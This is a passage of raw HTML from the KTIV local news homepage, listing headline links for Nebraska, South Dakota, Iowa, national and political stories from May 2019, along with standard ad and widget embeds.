tag-best-state-in-country tag-state-rankings tag-u-s-news-and-world-report post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/washington-state-takes-the-title-as-the-best-state-in-america-for-2019/"> <div class="elementor-post__thumbnail"><img width="300" height="167" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Washington-State-300x167.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Washington-State-300x167.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Washington-State-768x427.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Washington-State-1024x569.jpg 1024w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Washington-State-e1557935117294.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/washington-state-takes-the-title-as-the-best-state-in-america-for-2019/"> Washington State takes the title as the Best State in America for 2019 </a> </h3> </div> </article> </div> </div> </div> <div data-id="aaf54de" class="elementor-element elementor-element-aaf54de elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default"><a href="/nebraska-news/">CLICK FOR MORE NEBRASKA NEWS</a></h4> </div> </div> <div data-id="90aca61" class="elementor-element elementor-element-90aca61 elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div data-id="28797fd" class="elementor-element elementor-element-28797fd elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">South Dakota News</h2> </div> </div> <div data-id="44e7b25" class="elementor-element elementor-element-44e7b25 elementor-grid-4 elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-posts--thumbnail-top elementor-widget elementor-widget-posts" data-settings="{&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:0},&quot;classic_columns&quot;:&quot;4&quot;,&quot;classic_columns_tablet&quot;:&quot;2&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-137955 post type-post status-publish format-image has-post-thumbnail hentry category-south-dakota-news category-top-stories tag-cat tag-north-sioux-city-police-department tag-union-county-court post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/former-north-sioux-city-police-officer-charged-with-killing-residents-cat/"> <div class="elementor-post__thumbnail"><img width="300" height="188" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-300x188.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-300x188.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-768x480.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-1024x640.jpg 1024w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-e1557958453325.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/former-north-sioux-city-police-officer-charged-with-killing-residents-cat/"> Former North Sioux City police officer charged with killing resident&#8217;s cat </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137750 post type-post status-publish format-image has-post-thumbnail hentry category-south-dakota-news tag-house-move tag-vermillion post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/full-sized-home-escorted-through-vermillion-to-make-way-to-its-new-location/"> <div class="elementor-post__thumbnail"><img width="300" height="203" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-HOUSE-MOVING-300x203.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-HOUSE-MOVING-300x203.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-HOUSE-MOVING.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/full-sized-home-escorted-through-vermillion-to-make-way-to-its-new-location/"> Full sized home escorted through Vermillion to make way to it&#8217;s new location </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137743 post type-post status-publish format-image has-post-thumbnail hentry category-south-dakota-news category-top-stories tag-bliss-pointe-subdivision tag-south-dakota tag-trench tag-vermillion post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/man-trapped-briefly-after-trench-collapses-at-vermillion-work-site/"> <div class="elementor-post__thumbnail"><img width="300" height="203" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-TRENCH-COLLAPSE-300x203.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-TRENCH-COLLAPSE-300x203.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-TRENCH-COLLAPSE.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/man-trapped-briefly-after-trench-collapses-at-vermillion-work-site/"> Man trapped briefly after trench collapses at Vermillion, SD work site </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137698 post type-post status-publish format-image has-post-thumbnail hentry category-south-dakota-news category-top-stories tag-serenity-dennard tag-south-dakota post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/ground-search-resumes-for-missing-south-dakota-girl/"> <div class="elementor-post__thumbnail"><img width="300" height="188" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/02/Serenity-Dennard-NEW-300x188.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/02/Serenity-Dennard-NEW-300x188.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/02/Serenity-Dennard-NEW-768x480.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/02/Serenity-Dennard-NEW-1024x640.jpg 1024w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/02/Serenity-Dennard-NEW-e1551293536492.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/ground-search-resumes-for-missing-south-dakota-girl/"> Ground search resumes for missing South Dakota girl </a> </h3> </div> </article> </div> </div> </div> <div data-id="9ca3136" class="elementor-element elementor-element-9ca3136 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default"><a href="/south-dakota-news/">CLICK FOR MORE SOUTH DAKOTA NEWS</a></h4> </div> </div> <div data-id="bd18629" class="elementor-element elementor-element-bd18629 elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div data-id="aae1dac" class="elementor-element elementor-element-aae1dac elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Only on KTIV</h2> </div> </div> <div data-id="c7279fa" class="elementor-element elementor-element-c7279fa elementor-posts--thumbnail-left elementor-grid-3 elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-widget elementor-widget-posts" data-settings="{&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:0},&quot;classic_columns&quot;:&quot;3&quot;,&quot;classic_columns_tablet&quot;:&quot;2&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-22673 post type-post status-publish format-image has-post-thumbnail hentry category-only-on-ktiv tag-4-on-4 tag-anniversary tag-birthday post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2018/09/04/anniversary-birthday-salutes/"> <div class="elementor-post__thumbnail"><img width="300" height="169" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/09/04200107/Happy-Birthday_new-300x169.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/09/04200107/Happy-Birthday_new-300x169.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/09/04200107/Happy-Birthday_new.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2018/09/04/anniversary-birthday-salutes/"> Anniversary/Birthday salutes </a> </h4> </div> </article> <article class="elementor-post elementor-grid-item post-21674 post type-post status-publish format-image has-post-thumbnail hentry category-only-on-ktiv tag-copy tag-ktiv tag-request tag-video post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2018/09/02/21674/"> <div class="elementor-post__thumbnail"><img width="300" height="169" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/21141553/generic_image_1920x1080-300x169.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/21141553/generic_image_1920x1080-300x169.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/21141553/generic_image_1920x1080-768x432.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/21141553/generic_image_1920x1080-1024x576.jpg 1024w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/21141553/generic_image_1920x1080-e1539114916989.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2018/09/02/21674/"> Request video </a> </h4> </div> </article> <article class="elementor-post elementor-grid-item post-21646 post type-post status-publish format-image has-post-thumbnail hentry category-only-on-ktiv tag-sioux-city tag-siouxland-weather tag-storm-team-4-weather-app post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2018/08/13/download-the-storm-team-4-weather-app/"> <div class="elementor-post__thumbnail"><img width="300" height="169" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/WEB_SPLASHSCREEN_1920X1080-300x169.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/WEB_SPLASHSCREEN_1920X1080-300x169.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/WEB_SPLASHSCREEN_1920X1080-768x432.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/08/WEB_SPLASHSCREEN_1920X1080.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2018/08/13/download-the-storm-team-4-weather-app/"> Download the Storm Team 4 Weather App </a> </h4> </div> </article> </div> </div> </div> <section data-id="7480ec82" class="elementor-element elementor-element-7480ec82 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="2279aaad" class="elementor-element elementor-element-2279aaad elementor-column elementor-col-100 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="1c0d134b" class="elementor-element elementor-element-1c0d134b elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-4" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-4'); }); </script> </div> </div> <div data-id="57de02f9" class="elementor-element elementor-element-57de02f9 elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="51bb5220" class="elementor-element elementor-element-51bb5220 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="3b7ca2b6" class="elementor-element elementor-element-3b7ca2b6 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="7abdc34a" class="elementor-element elementor-element-7abdc34a elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">National News</h2> </div> </div> <div data-id="9faa704" class="elementor-element elementor-element-9faa704 elementor-grid-1 elementor-posts--thumbnail-none elementor-grid-tablet-1 elementor-grid-mobile-1 elementor-widget elementor-widget-posts" data-settings="{&quot;classic_columns&quot;:&quot;1&quot;,&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:15},&quot;classic_columns_tablet&quot;:&quot;1&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-138237 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/markets-right-now-stocks-rise-buoyed-by-walmart-cisco/"> Markets Right Now: Stocks rise, buoyed by Walmart, Cisco </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138230 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/woman-4-children-killed-in-central-missouri-crash/"> Woman, 4 children killed in central Missouri crash </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138232 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/lawsuit-targets-strip-searches-of-women-at-michigan-jail/"> Lawsuit targets strip searches of women at Michigan jail </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138226 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/board-reveres-clearing-of-officer-in-veteran-detention/"> Board reveres clearing of officer in veteran detention </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138222 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/judge-use-of-gps-data-in-robbery-case-unconstitutional/"> Judge: Use of GPS data in robbery case unconstitutional </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138217 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/cheap-trick-sara-gilbert-part-of-gala-honoring-linda-perry/"> Cheap Trick, Sara Gilbert part of gala honoring Linda Perry </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138206 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/feds-us-supreme-court-should-turn-down-bridgegate-appeal/"> Feds: US Supreme Court should turn down &#8216;Bridgegate&#8217; appeal </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138209 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/report-marine-corps-punished-instructors-over-hazing-claims/"> Report: Marine Corps punished instructors over hazing claims </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138176 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/rolling-stones-north-american-tour-to-start-in-chicago/"> Rolling Stones North American tour to start in Chicago </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138198 post type-post status-publish format-image has-post-thumbnail hentry category-national-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/us-home-construction-climbed-5-7-in-april/"> US home construction climbed 5.7% in April </a> </h3> </div> </article> </div> </div> </div> </div> </div> </div> <div data-id="46501a7f" class="elementor-element elementor-element-46501a7f elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="4ad99aab" class="elementor-element elementor-element-4ad99aab elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Iowa News</h2> </div> </div> <div data-id="d9f0107" class="elementor-element elementor-element-d9f0107 elementor-grid-1 elementor-posts--thumbnail-none elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-widget elementor-widget-posts" data-settings="{&quot;classic_columns&quot;:&quot;1&quot;,&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:15},&quot;classic_columns_tablet&quot;:&quot;2&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-138156 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/officials-think-mountain-lion-likely-has-left-des-moines/"> Officials think mountain lion likely has left Des Moines </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138196 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/iowa-based-testing-company-outsourcing-jobs-to-colorado-firm/"> Iowa-based testing company outsourcing jobs to Colorado firm </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138150 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/2020-hopeful-bullock-gets-endorsed-by-iowa-attorney-general/"> 2020 hopeful Bullock gets endorsed by Iowa attorney general </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137965 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/lewis-clark-system-begins-delivering-water-to-worthington/"> Lewis &amp; Clark system begins delivering water to Worthington </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137923 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/reynolds-dropped-from-suit-filed-over-alleged-discrimination/"> Reynolds dropped from suit filed over alleged discrimination </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137904 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/south-dakota-man-sentenced-for-robbing-iowa-bank-last-year/"> South Dakota man sentenced for robbing Iowa bank last year </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137839 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/iowa-town-struggling-to-recover-from-flooding/"> Iowa town struggling to recover from flooding </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137834 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/planned-parenthood-sues-state-over-sex-education-fund-denial/"> Planned Parenthood sues state over sex education fund denial </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137813 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/levee-in-western-iowa-to-be-repaired-under-8-5m-contract/"> Levee in western Iowa to be repaired under $8.5M contract </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137774 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/murder-conviction-reversed-on-stand-your-ground-instruction/"> Murder conviction reversed on stand-your-ground instruction </a> </h3> </div> </article> </div> </div> </div> </div> </div> </div> <div data-id="1faf009" class="elementor-element elementor-element-1faf009 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="3dfd6ff" class="elementor-element elementor-element-3dfd6ff elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Political News</h2> </div> </div> <div data-id="6fdf73c" class="elementor-element elementor-element-6fdf73c elementor-grid-1 elementor-posts--thumbnail-none elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-widget elementor-widget-posts" data-settings="{&quot;classic_columns&quot;:&quot;1&quot;,&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:15},&quot;classic_columns_tablet&quot;:&quot;2&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-138220 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/the-latest-trump-and-de-blasio-already-trading-insults/"> The Latest: Trump and de Blasio already trading insults </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138204 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/warren-proposes-new-ethics-rules-at-the-pentagon/"> Warren proposes new ethics rules at the Pentagon </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138182 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/jay-inslee-touts-9-trillion-climate-plan-as-economic-boom/"> Jay Inslee touts $9 trillion climate plan as economic boom </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138167 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/joe-biden-chooses-philadelphia-as-campaign-headquarters/"> Joe Biden chooses Philadelphia as campaign headquarters </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138158 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/nyc-mayor-de-blasio-is-seeking-democratic-nod-for-president/"> NYC Mayor de Blasio is seeking Democratic nod for president </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137727 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/the-latest-kamala-harris-open-to-reforming-supreme-court/"> The Latest: Kamala Harris open to reforming Supreme Court </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138020 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/guatemalan-court-rejects-candidacy-of-ex-prosecutor-aldana/"> Guatemalan court rejects candidacy of ex-prosecutor Aldana </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137802 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/the-latest-republican-jumps-into-tainted-nc-elections-redo/"> The Latest: NC candidates on the attack in election redo </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137713 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/trump-attacks-prosecutors-at-ceremony-for-fallen-officers/"> Trump criticizes prosecutors at ceremony for fallen officers </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137609 post type-post status-publish format-image has-post-thumbnail hentry category-political-news-from-the-associated-press post_format-post-format-image "> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/the-latest-several-us-leaders-traveling-to-lugar-funeral/"> The Latest: Pence says Lugar underscored peace, freedom </a> </h3> </div> </article> </div> </div> </div> </div> </div> </div> <div data-id="3d3644ef" class="elementor-element elementor-element-3d3644ef elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="295c3ac1" class="elementor-element elementor-element-295c3ac1 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">WATCH KTIV TONIGHT</h5> </div> </div> <div data-id="59b377e4" class="elementor-element elementor-element-59b377e4 elementor-widget elementor-widget-html" data-element_type="html.default"> <div class="elementor-widget-container"> <iframe src="https://www3.whig.com/pantheon/widgets/whatson/?site=ktiv&when=tonight" height="230" width="300" frameborder="0" scrolling="no"></iframe> </div> </div> <div data-id="1b83169c" class="elementor-element elementor-element-1b83169c elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-2" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-2'); }); </script> </div> </div> <div data-id="6efe1c9" class="elementor-element elementor-element-6efe1c9 elementor-widget elementor-widget-html" data-element_type="html.default"> <div class="elementor-widget-container"> <script src="https://embed.secondstreetapp.com/Scripts/dist/optin.js" data-ss-embed="optin" data-design-id="251138" ></script> </div> </div> <div data-id="229f17b" class="elementor-element elementor-element-229f17b elementor-widget elementor-widget-html" data-element_type="html.default"> <div class="elementor-widget-container"> <script src="https://ktiv.spingo.com/list-widget.js"></script> <div id="spingo-list-widget"></div> <script> new SpinGoWidget({ title: "KTIV 4" }); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section data-id="48afd40" class="elementor-element elementor-element-48afd40 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="33ee98c" class="elementor-element elementor-element-33ee98c elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="9fcee40" class="elementor-element 